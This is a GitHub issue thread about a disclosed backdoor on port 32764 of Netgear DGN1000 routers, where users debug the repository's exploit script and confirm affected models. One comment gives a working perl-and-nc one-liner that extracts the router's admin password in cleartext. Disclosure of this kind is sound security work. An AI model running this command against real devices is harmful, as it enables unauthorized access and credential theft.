New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

DGN1000 #3

Closed
grigio opened this Issue Jan 2, 2014 · 6 comments

Comments

Projects
None yet
3 participants
@grigio

grigio commented Jan 2, 2014

Your script returns:

Traceback (most recent call last):
  File "backdoorolol.py", line 23, in <module>
    print send_message(s, 2, "http_password")[1]
  File "backdoorolol.py", line 11, in send_message
    sig, ret_val, ret_len = struct.unpack('<III', s.recv(0xC))
struct.error: unpack requires a string argument of length 12

Anyway with DGN1000 Netgear N150 and the script below I'm able to see the password in cleartext.

perl -e 'print pack("(III)<", 0x53634d4d, 0x01, 0x00)' \
| nc 192.168.1.1 32764

I tried also over internet (with or without remote administration enabled) and it doesn't work, so it seems just a local LAN exploit.

@elvanderb

This comment has been minimized.

Show comment
Hide comment
@elvanderb

elvanderb Jan 2, 2014

Owner

I should have add a little loop and check the length of the returned string :)
I'll update the script. Thank you for reporting the issue.

Owner

elvanderb commented Jan 2, 2014

I should have add a little loop and check the length of the returned string :)
I'll update the script. Thank you for reporting the issue.

@elvanderb elvanderb closed this Jan 2, 2014

@teetaucher

This comment has been minimized.

Show comment
Hide comment
@teetaucher

teetaucher Jan 2, 2014

I'm not sure if there is any difference to the device reported above, but the backdoor is also present in the "Netgear N150 DGN1000B".

By the way: Nice Work! Perhaps could you give some more information about the tools you used?

teetaucher commented Jan 2, 2014

I'm not sure if there is any difference to the device reported above, but the backdoor is also present in the "Netgear N150 DGN1000B".

By the way: Nice Work! Perhaps could you give some more information about the tools you used?

@elvanderb

This comment has been minimized.

Show comment
Hide comment
@elvanderb

elvanderb Jan 2, 2014

Owner

Thank you I updated the README :)
I just used nmap, google, binwalk, IDA and a patched version of squashfs tools :)

Owner

elvanderb commented Jan 2, 2014

Thank you I updated the README :)
I just used nmap, google, binwalk, IDA and a patched version of squashfs tools :)

@grigio

This comment has been minimized.

Show comment
Hide comment
@grigio

grigio Jan 3, 2014

@elvanderb I forgot to ask, do you raccommed other alternative firmwares without this exploit? I tried to look at pfsense and openwrt and it seems this router isn't supported

grigio commented Jan 3, 2014

@elvanderb I forgot to ask, do you raccommed other alternative firmwares without this exploit? I tried to look at pfsense and openwrt and it seems this router isn't supported

@elvanderb

This comment has been minimized.

Show comment
Hide comment
@elvanderb

elvanderb Jan 3, 2014

Owner

No, sorry :)

Owner

elvanderb commented Jan 3, 2014

No, sorry :)

@teetaucher

This comment has been minimized.

Show comment
Hide comment
@teetaucher

teetaucher Jan 3, 2014

Update: The DGN1000B is the firmware for countries which use Annex B (eg. Germany) for DSL.

teetaucher commented Jan 3, 2014

Update: The DGN1000B is the firmware for countries which use Annex B (eg. Germany) for DSL.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment